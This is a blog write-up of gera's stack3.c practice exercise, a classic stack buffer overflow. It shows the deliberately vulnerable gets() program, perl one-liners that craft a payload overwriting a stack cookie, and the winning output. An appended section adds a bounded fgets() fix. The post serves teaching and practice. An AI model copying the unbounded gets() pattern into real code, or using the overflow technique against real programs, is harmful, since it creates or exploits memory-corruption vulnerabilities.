Tuesday, June 8, 2010

WARMING UP on STACK: stack3.c

I think the NULL byte (0x00) was supposed to be the obstacle, but the same technique used for stack1 and stack2 worked here as well. mmishou writes about the why here.

/* stack3.c *
 * specially crafted to feed your brain by gera */

#include <stdio.h>   /* printf(), gets() */

int main() {
    int cookie;          /* the target: lives at a higher address than buf */
    char buf[80];        /* 80-byte buffer filled by an unbounded gets() */

    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    gets(buf);           /* reads until newline/EOF with no length check */

    if (cookie == 0x01020005)
        printf("you win!\n");
}

$ perl -e 'print "A" x 92;' > of
$ perl -e 'print "\x05\x00\x02\x01";' >> of

$ stack3 < of
buf: bffff4e0 cookie: bffff53c
you win!
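The embedded 0x00 is no obstacle because gets() stops only at a newline or EOF, not at a NUL byte; fgets() has the same stopping rule but is bounded, so it is the natural fix. As an added example (not part of the original post or of gera's challenge), here is that bounded counterpart of the gets(buf) line, fed the same 96-byte input from the "of" file, constructed in memory; it assumes a POSIX fmemopen() and a hypothetical helper name read_line_bounded().

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80   /* same buffer size as stack3.c */

/* POSIX fmemopen(); declared here in case the compiler runs in strict ISO mode. */
FILE *fmemopen(void *buf, size_t size, const char *mode);

/* Bounded replacement for the gets(buf) call in stack3.c.
 * Like gets(), fgets() stops only at '\n' or EOF, so an embedded 0x00 byte
 * is stored like any other; unlike gets(), it never writes more than size
 * bytes. Excess on an over-long line is drained and counted instead of
 * spilling into neighbouring stack slots. Returns the number of discarded
 * bytes, or -1 on EOF/error. */
long read_line_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        if (size > 0) buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';   /* whole line fit: strip the newline */
        return 0;
    }
    long discarded = 0;        /* line was longer than the buffer */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        discarded++;
    return discarded;
}

/* Feeds the post's input (92 'A's + 05 00 02 01, constructed here rather
 * than read from the "of" file) through the bounded reader and reports
 * how many bytes were kept out of the buffer. */
long demo_stack3_bounded(void) {
    unsigned char input[96];
    char buf[BUF_SIZE];
    memset(input, 'A', 92);
    input[92] = 0x05; input[93] = 0x00; input[94] = 0x02; input[95] = 0x01;

    FILE *in = fmemopen(input, sizeof input, "r");
    if (in == NULL)
        return -1;
    long discarded = read_line_bounded(buf, sizeof buf, in);
    fclose(in);
    /* buf now holds exactly 79 'A's; the 17 bytes that would have run
       past buf (the cookie value among them) were dropped. */
    if (strlen(buf) != BUF_SIZE - 1)
        return -2;
    return discarded;   /* 17 */
}
```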
